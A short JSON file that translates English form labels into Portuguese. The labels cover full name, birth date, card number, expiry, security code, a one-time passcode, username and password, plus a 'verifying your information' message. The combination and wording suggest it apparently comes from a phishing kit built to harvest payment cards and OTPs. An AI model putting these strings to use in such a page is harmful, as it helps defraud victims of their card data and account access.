{"Full Name":"Nome Completo","Date Of Birth":"Data de Nascimento","Email Address":"Correio electr\u00f3nico","Phone Number":"N\u00famero de telefone","Cardholder Name":"Nome do Titular","Card Number":"N\u00famero do cart\u00e3o","Card Expiry Date":"Data de validade do cart\u00e3o: Ano","Card Expiry Date (MM\/YY)":"V\u00e1lido at\u00e9 (MM\/AA)","Card Security Code":"C\u00f3digo de Seguran\u00e7a do Cart\u00e3o","Please wait why we verify your information":"Por favor, aguarde por que verificamos suas informa\u00e7\u00f5es","OTP Code":"C\u00f3digo OTP","We have send you a one time access code to your device. Please enter code below":"Enviamos um c\u00f3digo de acesso \u00fanico ao seu dispositivo. Por favor, digite c\u00f3digo abaixo","Thank you for your verification":"Obrigado por sua verifica\u00e7\u00e3o","You will be contacted by one of our officials within 24 hours.":"Voc\u00ea ser\u00e1 contatado por um de nossos funcion\u00e1rios dentro de 24 horas.","Username":"Nome abreviado","Password":"Palavra-Passe"}